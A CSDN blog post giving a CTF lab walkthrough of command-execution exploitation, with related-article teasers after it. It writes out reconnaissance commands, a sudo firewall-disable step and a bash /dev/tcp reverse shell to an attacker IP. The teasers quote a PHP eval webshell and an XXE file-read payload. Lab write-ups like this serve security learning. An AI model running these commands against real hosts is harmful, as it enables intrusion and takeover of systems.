CTF实验:web安全命令执行

最新推荐文章于 2024-09-27 20:38:25 发布
最新推荐文章于 2024-09-27 20:38:25 发布
阅读量1.6k 收藏 3
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/floyd_art/article/details/105466227
版权

命令执行漏洞介绍

当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常命令中,造成命令执行攻击。
  调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,又没有过滤用户的输入的情况下,就会造成命令执行漏洞。

信息探测

扫描主机服务信息以及服务版本
– nmap -sV 靶场IP地址
探测敏感信息
– nikto -host http://靶场IP地址:端口
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

找到敏感以页面
在这里插入图片描述
在这里插入图片描述

漏洞利用

查看临时缓冲目录:ls -alh /tmp/
查看home目录,挖掘用户信息:ls -alh /home/
查看具体用户的目录:ls -alh /home/用户名/
查看系统信息:uname -a

利用ssh命令 执行root权限命令
使用ssh 用户名@localhost通过ssh登录服务器是不需要身份验证的;
查看bill用户 sudo命令的权限:ssh bill@localhost sudo -l
关闭防火墙:ssh bill@localhost sudo ufw disable

在这里插入图片描述
在这里插入图片描述

反弹shell

攻击机启动监听netcat
nc -nlvp 4444
靶场机器反弹shell
ssh bill@localhost sudo bash -i >& /dev/tcp/攻击机IP/4444 0>&1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

获取Flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd /root/
ls
cat flag
Writeup 测试文档 总结文档
在这里插入图片描述

总结

在CTF比赛中,命令执行漏洞具有很多过滤机制。对于开放ssh服务的靶场机器,可以采取本节课中的方法进行渗透靶场机器。如果没有开放ssh服务,则需要利用绕过过滤技巧来达到命令执行的目的。

在这里插入图片描述

floyd_art
关注
专栏目录
【愚公系列】2024年03月 《CTF实战:从入门到提升》 011-Web安全入门(PHP反序列化漏洞)
时光隧道
03-30 5万+
PHP是一种广泛使用的开源服务器端脚本语言,它支持面向对象的编程范式。在PHP,类和对象是用于封装数据与功能的核心组件,它们使得代码更加模块化、易于管理和扩展。在处理对象持久化——即在不同会话或不同请求之间保存对象状态的过程,序列化和反序列化是两个非常重要的概念。反序列化漏洞通常发生在不安全地反序列化用户提供的数据时。代码执行:攻击者可能会注入恶意对象,当这个对象被反序列化时,它可能会触发任意代码执行。对象注入:通过构造特殊的序列化数据,攻击者可能会在应用程序上下文创建不正当的对象实例。
【愚公系列】2024年03月 《CTF实战:从入门到提升》 009-Web安全入门(PHP文件包含漏洞)
热门推荐
时光隧道
03-01 6万+
PHP文件包含漏洞是指在PHP代码存在安全漏洞,允许攻击者包含并执行恶意文件或代码。PHP文件包含漏洞通常发生在以下两种情况下:动态文件包含:当PHP代码使用动态输入来包含文件时,攻击者可能通过构造恶意输入来包含并执行任意文件。这可能会导致攻击者执行远程代码、读取服务器上的敏感文件,或者执行其他恶意操作。本地文件包含:当PHP代码使用本地文件路径来包含文件时,攻击者可能通过修改文件路径参数来包含并执行任意文件。这可能会导致攻击者读取服务器上的敏感文件,或者执行其他恶意操作。
[NISACTF 2022]bingdundun
jhk8698的博客
10-19 1807
[NISACTF 2022]bingdundun 刷题记录
ctfshow-web入门系列-命令执行-web29-web36
最新发布
m0_74416116的博客
09-27 2062
ctfshow 命令执行入门学习
BUUCTF-web极客大挑战
zhhhb1005的博客
04-17 3768
目录 [极客大挑战 2019]Knife [极客大挑战 2019]Http [极客大挑战 2019]Upload ​ [极客大挑战 2019]PHP [极客大挑战 2019]Knife eval($_POST["Syc"]); 这是一个典型的后门程序,用蚁剑链接复制url,密码则是页面给的密码Syc。 在根目录下找到flag文件,得出flag。 [极客大挑战 2019]Http 打开页面后查看源代码,发现一个php文件 打开链接node4.buuoj..
第二届陇剑杯2023线上wp
5L2g556F5ZWl77yf
09-07 1010
题目内容:服务器开放了哪些端口,请按照端口大小顺序提交答案,并以英文逗号隔开(如服务器开放了 80 81 82 83 端口,则答案为 80,81,82,83)半开放扫描端口开放状态。
Htlab_Weekly_Ctf_13&14
qq_45628145的博客
07-27 375
simplexxe 一个简单的xml注入题,源码提示说flag在/opt/flag.txt里面,读一下即可得到flag payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY a SYSTEM "file:///opt/flag.txt"> ]> <user><username>&a;</username><password&
CTF-目录遍历
su__xiaoyan的博客
12-28 3915
目录遍历 目录遍历(又称为路径遍历攻击、目录爬升或者回溯),旨在访问存储在web根目录文件夹之外的文件和目录,通过操纵带有“点-点-斜线”序列及变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置文件和系统关键文件。但是系统访问控制限制了对于某些文件的权限。 利用目录遍历漏洞getshell的思路 上传webshell到服务器上面,通过对应的目录遍历漏洞访问webshell,执行webshell,在攻击者的机器上面获取并反弹shell。 实
CTF Web各种题目的解题姿势
07-27
第2章 代码执行命令执行 课时1:代码执行介绍49'32 课时2:命令执行介绍20'14 课时3:命令执行分类20'12 课时4:命令执行技巧24'30 课时5:长度限制的命令执行25'46 课时6:无数字和字母命令执行10'27 第3章...
CTFweb安全基础
weixin_45574957的博客
03-15 1541
CTF WEB安全
DVWA 实验报告:2、命令注入
看那白熊
04-11 3075
本节主要讲解 DVWA_v1.9 命令注入部分。 覆盖全部四种安全级别,从源码分析的角度上进行攻击测试。 适合新手小白。
[GWCTF 2019]我有一个数据库
SopRomeo的博客
04-15 3142
进去一堆乱码,扫下目录 御剑扫到了robots.txt,有个phpinfo dirsearch 扫到了 进去phpmyadmin看看 竟然可以直接进去,根本不需要登录 但是里面并没有一些我们想要的信息,看看他的版本 百度搜搜这个版本对应的漏洞 参考文献1 参考文献2 可以发现在index.php里 include $_REQUEST['target']; include这个函数,很可能存在...
CTF夺旗 服务安全FTP服务
qq_43613772的博客
06-05 854
FTB的简介: FTP 是File Transfer Protocol(文件传输协议)的英文简称,而文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当,用户经常遇到两个概念:“下载”(Download)和"上传"(Uploa...
CTF训练 web安全目录遍历
梁辰兴的博客
10-23 1244
路径遍历攻击(也称目录遍历)旨在访问存储在web根文件夹之外的文件和目录。通过操纵带有 “点-斜线(…)” 序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件及目录,包括应用程序源代码、配置和关键系统文件。需要注意的是,系统操作访问控制(如在微软Windows操作系统上锁定或使用文件)限制了对方的访问权限。这种攻击也称为 “点-斜点线”、“目录遍历”、“目录爬升” 和 “回溯”。
2023陇剑杯答题笔记(更新
Mad Soycat的博客
03-14 2242
打开流量包,按照时间顺序可以推测192.168.162.180为服务器ip,192.168.162.188为客户机ip。于是首先过滤出服务器响应的部分可以使用过滤器输入命令,表示过滤出目标ip为188的SYN-ACK包。这是由于TCP三次握手,服务端会返回SYN-ACK包完成过滤后检查数据包,可以看到Src Port就是服务器开放端口全部检查后发现总共三个:80, 888和8888,就是最后的答案。
ctf常用的linux文件路径
weixin_42267615的博客
11-16 1189
加上那个数字即可,在Linux系统,如果一个程序用 open() 打开了一个文件,但是最终没有关闭它,即使从外部(如:os.remove(SECRET_FILE))删除这个文件之后,在/proc这个进程的 pid目录下的fd文件描述符目录下还是会有这个文件的文件描述符,通过这个文件描述符我们即可以得到被删除的文件的内容。所以一般情况下,这个文件是不可读的。目录保存了Apache服务器的帮助手册文件,文件是网页格式的,可以通过访问Apache服务器的/manual目录阅读该目录下的帮助文件内容。
WEB综合渗透
JJH2724719395的博客
11-22 3673
web综合渗透
获取flag
qq_49091880的博客
01-02 1万+
获取FLAG 一、SSH服务器 1.如何从外部进入最终root主机,获得flag SSH:建立在应用层基础上的协议 SSH是目前较可靠,专门远程登录会话和其他网络服务提供安全性的 协议。利用SSH协议可以有效防止远程管理过程的信息泄露问题 2.SSH基于TCP 22端口的服务 3.SSH协议认证机制 (1)基于口令的安全验证 (2)基于密钥的安全验证 注:id_rsa:私钥 id_rsa.pub:公钥 二、实验环境 1.攻击机:192.168.1.105 2.靶机机器:192.168.1.106
CTF训练 ssh服务渗透:如何从外部进入最终root主机,取得flag
weixin_44716769的博客
10-31 4572
CTF训练 ssh服务渗透 如何从外部进入最终root主机,取得flag SSH协议介绍 SSH为Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。 SSH是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssH协议可以有效防止远程管理过程的信息泄露问题。 SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络的漏洞。SSH客户端适用于多种平台。几乎所有
CTF挑战:远程命令执行(RCE)与Web安全策略
"了解CTF(Capture The Flag)竞赛关于远程命令执行(RCE)的概念,以及如何在Web安全场景下利用和防范此类漏洞" 远程命令执行(RCE)是一种严重的安全漏洞,它允许攻击者通过Web接口执行任意系统命令。当服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值